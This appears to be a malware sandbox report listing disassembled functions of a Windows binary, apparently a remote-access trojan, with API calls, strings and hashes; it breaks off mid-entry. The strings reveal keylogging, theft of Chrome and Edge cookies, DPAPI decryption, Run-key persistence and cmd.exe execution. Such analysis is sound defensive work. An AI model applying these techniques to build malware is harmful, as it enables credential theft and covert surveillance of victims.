                                      Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
                                      • GetLastError.KERNEL32 ref: 0044B931
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                      • String ID: PkGNG
                                      • API String ID: 2456169464-263838557
                                      • Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                      • Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
                                      • Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
                                      • Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                        • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F
                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                        • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                        • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                      • String ID: /sort "Visit Time" /stext "$0NG
                                      • API String ID: 368326130-3219657780
                                      • Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                      • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                      • Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
                                      • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcslen.LIBCMT ref: 004162F5
                                        • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                        • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                        • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                        • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _wcslen$CloseCreateValue
                                      • String ID: !D@$okmode$PG
                                      • API String ID: 3411444782-3370592832
                                      • Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                      • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                      • Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
                                      • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688
                                      Strings
                                      • User Data\Default\Network\Cookies, xrefs: 0040C603
                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      • Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                      • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                                      • Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
                                      • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                                      • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757
                                      Strings
                                      • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                                      • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                      • API String ID: 1174141254-1980882731
                                      • Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                      • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                                      • Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
                                      • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
                                      • CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
                                      • CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A
                                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTimewsprintf
                                      • String ID: Offline Keylogger Started
                                      • API String ID: 465354869-4114347211
                                      • Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                      • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                      • Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
                                      • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
                                      • CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
                                      • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTime$wsprintf
                                      • String ID: Online Keylogger Started
                                      • API String ID: 112202259-1258561607
                                      • Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                                      • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                                      • Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
                                      • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                      • API String ID: 481472006-3277280411
                                      • Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                      • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                      • Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
                                      • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 00404F81
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                      • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$EventLocalThreadTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 2532271599-1507639952
                                      • Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                                      • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                      • Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                                      • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                      • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: CryptUnprotectData$crypt32
                                      • API String ID: 2574300362-2380590389
                                      • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                      • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                      • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                      • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                      • GetLastError.KERNEL32 ref: 0044C296
                                      • __dosmaperr.LIBCMT ref: 0044C29D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorFileLastPointer__dosmaperr
                                      • String ID: PkGNG
                                      • API String ID: 2336955059-263838557
                                      • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                      • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                      • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                      • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                      • CloseHandle.KERNEL32(?), ref: 004051CA
                                      • SetEvent.KERNEL32(?), ref: 004051D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandleObjectSingleWait
                                      • String ID: Connection Timeout
                                      • API String ID: 2055531096-499159329
                                      • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                      • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                      • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                      • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2005118841-1866435925
                                      • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                      • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                      • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                      • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                      • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FormatFreeLocalMessage
                                      • String ID: @J@$PkGNG
                                      • API String ID: 1427518018-1416487119
                                      • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                      • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                      • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                      • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,76F937E0,?), ref: 0041384D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,76F937E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 1818849710-1051519024
                                      • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                      • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                      • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                      • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                        • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                        • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                      • String ID: bad locale name
                                      • API String ID: 3628047217-1405518554
                                      • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                      • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                      • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                      • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                      • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                      • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Control Panel\Desktop
                                      • API String ID: 1818849710-27424756
                                      • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                      • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                      • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                      • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                      • ShowWindow.USER32(00000009), ref: 00416C61
                                      • SetForegroundWindow.USER32 ref: 00416C6D
                                        • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                        • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                        • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                      • String ID: !D@
                                      • API String ID: 3446828153-604454484
                                      • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                      • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                      • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                      • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: /C $cmd.exe$open
                                      • API String ID: 587946157-3896048727
                                      • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                      • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                      • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                      • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                      • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetCursorInfo$User32.dll
                                      • API String ID: 1646373207-2714051624
                                      • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                      • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                      • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                      • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                      • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                      Strings
                                      Memory Dump Source
